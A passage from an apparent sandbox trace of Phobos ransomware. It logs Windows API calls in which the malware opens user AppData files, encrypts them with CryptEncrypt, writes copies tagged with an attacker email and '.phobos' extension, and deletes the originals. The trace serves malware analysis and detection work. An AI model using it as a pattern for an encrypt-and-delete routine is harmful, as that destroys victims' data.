(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini")) returned 0x6 [0193.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.317] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.317] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.318] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.318] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdd, lpOverlapped=0x0) returned 1 [0193.319] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0193.319] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0193.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.320] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.320] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.320] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.320] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.320] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.320] CloseHandle (hObject=0x164) returned 1 [0193.320] CloseHandle (hObject=0x194) returned 1 [0193.320] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini")) returned 1 [0193.321] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.321] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=412) returned 1 [0193.321] CloseHandle (hObject=0x194) returned 1 [0193.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini")) returned 0x6 [0193.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.322] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.322] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.323] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.323] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.323] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x19c, lpOverlapped=0x0) returned 1 [0193.324] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0) returned 1 [0193.324] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a0, lpOverlapped=0x0) returned 1 [0193.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.325] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.325] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.325] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.325] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.325] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.325] CloseHandle (hObject=0x194) returned 1 [0193.325] CloseHandle (hObject=0x164) returned 1 [0193.325] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini")) returned 1 [0193.326] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.327] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32768) returned 1 [0193.327] CloseHandle (hObject=0x164) returned 1 [0193.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat")) returned 0x2026 [0193.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.327] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.327] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0193.744] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0193.744] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.744] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8000, lpOverlapped=0x0) returned 1 [0193.745] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010, dwBufLen=0x8010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010) returned 1 [0193.745] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8010, lpOverlapped=0x0) returned 1 [0193.746] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.746] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.746] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.747] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.747] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.747] CryptDestroyKey (hKey=0xa327e8) returned 1 [0193.747] CloseHandle (hObject=0x164) returned 1 [0193.747] CloseHandle (hObject=0x178) returned 1 [0193.747] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat")) returned 1 [0193.748] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0193.749] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=52) returned 1 [0193.749] CloseHandle (hObject=0x178) returned 1 [0193.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat")) returned 0x2 [0193.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0193.749] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.749] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.955] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0193.955] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.955] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x34, lpOverlapped=0x0) returned 1 [0193.956] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.956] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40, lpOverlapped=0x0) returned 1 [0193.956] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0193.956] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.957] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.957] CryptDestroyKey (hKey=0xa32a28) returned 1 [0193.957] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0193.957] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.957] CloseHandle (hObject=0x178) returned 1 [0193.957] CloseHandle (hObject=0x194) returned 1 [0193.957] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat")) returned 1 [0193.958] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0193.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.170] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=168) returned 1 [0194.170] CloseHandle (hObject=0x14c) returned 1 [0194.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml")) returned 0x2020 [0194.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.170] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.170] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.262] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.262] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.262] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa8, lpOverlapped=0x0) returned 1 [0194.263] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0194.263] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0194.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.264] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.264] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0194.264] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.264] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0194.264] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.264] CloseHandle (hObject=0x14c) returned 1 [0194.264] CloseHandle (hObject=0x180) returned 1 [0194.265] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml")) returned 1 [0194.266] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.267] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=196) returned 1 [0194.267] CloseHandle (hObject=0x180) returned 1 [0194.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 